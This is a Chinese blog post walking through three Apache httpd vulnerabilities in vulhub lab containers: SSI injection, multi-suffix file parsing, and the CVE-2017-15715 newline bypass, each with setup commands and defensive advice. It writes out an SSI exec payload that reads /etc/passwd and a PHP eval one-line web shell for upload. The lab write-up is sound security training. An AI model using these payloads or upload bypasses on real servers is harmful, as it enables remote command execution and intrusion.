vulhub-httpd漏洞复现

最新推荐文章于 2024-06-26 17:30:04 发布
最新推荐文章于 2024-06-26 17:30:04 发布
阅读量258 收藏
点赞数
分类专栏: web渗透 文章标签: docker php 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51922767/article/details/120538963
版权

我的博客:acsec.xyz
微信公众号: Ac sec

一.SSI注入

1.概述

SSI:服务器端嵌入或者叫服务器端包含,是Server Side Include的简写。SSI技术通过在文档中加入SSI指令,让服务器端在输出文档之前解析SSI指令,并把解析完的结果和文档一同输出给客户端。

SSI的指令格式为:<!-- #directive parameter=“value” – >。其中,directive是指令名,parameter指令参数,value指令参数值。

可以看到,就是html注释,Web服务器开启了SSI,并且页面包含可以解析的指令,那么Web服务器就解析这个指令。没开启器SSI或者开启了SSI,但是不是可以解析的指令,那么都当做注释。注意的是,“#”要和directive连在一起,中间不能含有空格。

SSI包含的指令有:

config:修改 SSI 的默认设置
echo:显示环境变量
exec:执行 CGI 脚本
flastmod :显示指定文件的最后修改日期
fsize:显示指定文件的大小
include:把其它文档插入到当前被解析的文档中


2.环境搭建

前提是已经安装docker,看我前面Java and php反序列化漏洞 | Active Blog (acsec.xyz)这篇文章java反序列化中有安装教程。

systemctl start docker   //启动docker
git clone https://github.com/vulhub/vulhub.git  //拉取vulhub靶场代码
cd /vulhub/httpd/ssi-rce   //进入ssi目录
docker-compose up -d   //启动docker环境

访问http://192.168.60.148:8080/upload.php即可

在这里插入图片描述


3.复现

创建文件shell.shtml,写入

<!--#exec cmd="cat /etc/passwd"-->

在这里插入图片描述


上传后访问

在这里插入图片描述


这里用burp更方便修改内容实现命令执行

在这里插入图片描述

在这里插入图片描述


docker-compose down  //停止docker

进入下一关


4.防护

  • 关闭服务器SSI功能
  • 过滤相关SSI特殊字符(<,>,#,-,",’)

二.Apache httpd 多后缀解析漏洞

1.概述

httpd是Apache超文本传输协议(HTTP)服务器的主程序。被设计为一个独立运行的后台进程,它会建立一个处理请求的子进程或线程的池。

漏洞原理:
apache httpd支持一个文件有多个后缀,如:test1.php.rar。在windows下,会直接根据最后的.来进行分隔,将其判定为pdf文件,但在apache中可不是这样的,apache会从后往前依次进行判别,遇到不认识的后缀,便会往前读,如果还是不认识再往前,若是到最后一个都不认识,则会将该文件当成默认类型文件读取。

在etc目录下有个mime.types文件定义了apache可以识别的文件后缀。以下是该文件部分内容:
该解析漏洞产生的原因一部分是基于apache的这种特性,还有一大部分原因都是由于开发人员的配置不当构成的,当运维人员在配置文件给.php添加了处理器时:AddHandler application/x-httpd-php .php。
多后缀的文件名中只要存在.php后缀,则就会将该文件当做php文件解析。


2.环境搭建

cd /vulhub/httpd/apache_parsing_vulnerability
docker-compose build
docker-compose up -d

访问http://192.168.60.148即可


3.复现

创建shell.pgp.jpg,写入

<?php @eval($_POST['acsec']);?>

上传文件

在这里插入图片描述

路径:http://192.168.60.148/uploadfiles/shell.php.jpg

利用:

在这里插入图片描述

docker-compose down  //停止docker

4.防护

  • 将AddHandler application/x-httpd-php.php的配置文件删除;
  • 设置上传目录不可执行;
  • 文件上传后重命名:时间戳+后缀名。

三.Apache httpd换行解析漏洞(CVE-2017-15715)

1.概述

影响版本:2.4.0 ~ 2.4.29

漏洞原理:
此漏洞的出现是由于apache在修复第一个后缀名解析漏洞时,用正则来匹配后缀。在解析php时xxx.php\x0A将被按照php后缀进行解析,导致绕过一些服务器的安全策略。

在上传文件时,对文件名进行了黑名单限制,我们利用该漏洞上传一个1.php文件,使用burpsuit抓包。在1.php后插入一个\x0A,绕过黑名单过滤。访问1.php%0A,即可看到文件被当做php解析。


2.环境搭建

cd /vulhub/httpd/CVE-2017-15715
docker-compose up -d

访问http://192.168.60.148:8080即可


3.复现

创建evil.php

<?php @eval($_POST['acsec']);?>

burp抓包,在php后面留一个空格出来

在这里插入图片描述

把空格的16进制值“20”改成换行符的16进制值“0a”,注意:不要直接改后面的0d、0a,否则没有效果

在这里插入图片描述

上传访问http://192.168.60.148:8080/evil.php%0A成功解析

在这里插入图片描述


4.防护

  • 该漏洞仅针对于apache的2.4.0~2.4.29版本,升级apache版本即可避过该漏洞。
  • 获取文件名时使用$_FILES[‘file’] [‘name’]会自动把换行符去掉
0xActive
关注
专栏目录
uc-httpd-1.0.0-buffer-overflow-exploit:uc-httpd 1.0.0缓冲区溢出漏洞利用PoC
05-10
uc-httpd-1.0.0-buffer-overflow-exploit [熊麦uc-httpd 1.0.0缓冲区溢出漏洞利用概念证明] 概念证明代码:0dayPoC.py CVE-2018-10088 感谢CVE分配团队为构建以下内容提供的帮助: [描述] 通过XiongMai uc-httpd ...
SSI注入实战
qq_23347209的博客
05-28 1278
文章目录靶机环境一、服务器信息搜集二、网站信息搜集1.使用nikto扫描网站目录2.浏览网站三、SSI注入漏洞利用1、SSI注入简介:2、SSI注入测试网站四、利用nc反弹shell——失败五、使用msf框架1、python木马生成2、建立木马监听端3、上传木马文件到本地web服务器上4、构造SSI注入语句执行木马 靶机环境 靶机下载网站:https://www.vulnhub.com/ 使用Vmware虚拟机中NAT网络 靶机 192.168.146.150 攻击机 parrot 192.168.14
CTF之Web安全SSI注入
小司机的奥拓
08-10 300
如何从外部进入主机?SSI(server side inject)的出现是为了赋予HTML静态页面动态的效果,通过SSI来执行系统命令;并返回对应的结果。如果再网站目录中发现了.stm;.shtm;.shtml;这样的文件后缀名,并且网站对于SSI的输入没有做到严格过滤或者过滤不充分;很有可能被SSI注入攻击。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
SSI 注入漏洞
最新发布
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
06-26 559
通过信息收集技术,了解我们的检测目标运行哪些类型的 Web 服务器,查看检测网站的内容来猜测是否支持 SSI,由于 .shtml 文件后缀名是用来表明网页文件是否包含 SSI 指令的,因此如果该网站使用了 .shtml 文件,那说明该网站支持 SSI 指令。在很多场景中,用户输入的内容可以显示在页面中,比如一个存在反射 XSS 漏洞的页面,如果输入的 payload 不是 XSS 代码而是 SSI 标签,服务器又开启了 SSI 支持的话就会存在 SSI 漏洞。SSI 具有强大的功能,只要使用一条简单的。
httpd安装包--httpd安装包
02-20
这个压缩包文件"**httpd_pack**"包含了用于在Linux系统上安装httpd的RPM(Red Hat Package Manager)格式的安装包。下面我们将深入探讨httpd的安装过程以及相关的知识点。 首先,让我们了解RPM安装包的使用方法。...
httpd24-httpd-2.4.34-7.el7.x86_64.rpm
12-10
离线安装包,亲测可用
centos-logos-httpd-85.8-2.el8.noarch(1).rpm
12-06
离线安装包,亲测可用
And-httpd web server-开源
04-24
And-httpd-0.99.11是该软件的一个特定版本,通常每个版本都会包含一些新功能、性能提升或错误修复。在下载这个版本后,用户可以解压文件,找到包含可执行文件、文档、示例配置等在内的资源。通过阅读文档,开发者...
SSI漏洞注入
weixin_45007073的博客
01-04 938
在进行SSI漏洞注入之前,先介绍一下什么是SSI漏洞。 SSI 注入全称Server-Side Includes Injection,即服务端包含注入。SSI 是类似于 CGI,用于动态页面的指令。SSI 注入允许远程在 Web 应用中注入脚本来执行代码。 准备工作 靶机地址: 链接:https://pan.baidu.com/s/1MTunDny-m5eICXAS9P8ugA 提取码:x3c2 漏洞复现过程 使用netdiscover发现存活主机 netdidscover -i eth0 使用n
SSTI服务器模板注入原理&攻击手法&绕过手法&防御手段
qq_56815564的博客
07-31 1219
时间一晃,又是好久没有发过文章了,最近再准备面试了,当你真正去准备的时候你才会发现自己原来什么都还只是个半吊子,哎难顶正好看到一道面试题,说是说一下python有关的漏洞,这边因为对php漏洞熟悉一点,所以这方面我发现我是真的什么都不知道,于是上网去找了很久,再学习的过程中顺便总结了这篇文章吧🙏。
Apache SSI 远程命令执行漏洞
m0_52701599的博客
02-19 847
Apache SSI 远程命令执行漏洞
ssti注入及绕过,ssti靶场过关
2202_75361164的博客
10-09 420
普通的cookie并不安全,可以通过客户端修改在Tornado框架中,cookie_secret是一个密钥,一般使用随机生成的字符串,被用于对生成的cookie进行加密。它的作用是确保cookie的安全性,防止被修改或伪造。具体来说,当Tornado应用程序使用set_secure_cookie()函数设置cookie时,会使用cookie_secret对cookie进行加密。而在获取cookie时,Tornado则会使用同样的密钥进行解密,并验证cookie是否被篡改。
超详细SSTI模板注入漏洞原理讲解
qq_61955196的博客
08-11 4221
本文指在让第一次接触SSTI注入漏洞的师傅们能更加详细的了解和明白该漏洞的原理
SSI注入漏洞
Hydra的博客
11-19 9507
SSI 注入全称Server-Side Includes Injection,即服务端包含注入。SSI 是类似于 CGI,用于动态页面的指令。SSI 注入允许远程在 Web 应用中注入脚本来执行代码。 SSI是嵌入HTML页面中的指令,在页面被提供时由服务器进行运算,以对现有HTML页面增加动态生成的内容,而无须通过CGI程序提供其整个页面,或者使用其他动态技术。 从技术角度上来说,SSI就是...
ssi注入详解
D1stiny的博客
05-22 1798
ssi是赋予html静态页面的动态效果,通过ssi执行命令,返回对应的结果,若在网站目录中发现了.stm .shtm .shtml等,且对应SSL输入没有过滤,可能存在SSI注入漏洞 简单的说ssi注入就是寻找输入点输入类似<!--#exec cmd="命令" --> 格式,看看能不能运行系统命令 首先netdiscover -r 你的ip/24扫描得到靶场IP 用nmap进行扫描 用dirb进行扫描 发现了ssi,意识到可能是ssi注入 访问一下http://192.168.199.1
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值